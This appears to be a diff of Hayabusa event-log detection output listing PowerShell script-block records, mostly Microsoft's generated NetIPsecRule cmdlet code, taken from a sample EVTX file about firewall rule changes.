$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 